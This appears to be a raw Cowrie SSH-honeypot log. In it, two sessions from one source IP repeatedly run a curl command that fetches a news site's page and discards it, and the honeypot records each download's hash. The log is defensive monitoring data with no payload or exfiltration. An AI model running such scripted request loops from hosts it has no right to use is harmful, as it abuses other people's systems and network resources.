{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.540105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.546395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.551483Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.553581Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.566897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.567978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.575883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.577129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.607238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.611292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.612760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.615171Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.616065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.616980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.638201Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.650361Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.651905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.652874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.655747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.656664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.685480Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.691305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.692305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.695230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.696079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.698584Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.720140Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.728683Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.729653Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.738514Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.739461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.747340Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.760752Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.768003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.768897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.771641Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.778888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.779912Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.783285Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.791547Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.802173Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.804722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.805642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.815792Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.819128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.820232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.838100Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.840499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.841489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.844551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.857386Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.858481Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.876424Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.877286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.881776Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.887243Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.889808Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.898741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.899773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.914319Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.916084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.919785Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.925206Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.940841Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.942149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.943150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.951445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.952783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.964308Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.986586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.987720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:56.990913Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:56.992413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.012150Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.020997Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.029053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.030105Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.033640Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.035006Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.035938Z","src_ip":"212.227.125.160","session":"7541ed730449"}
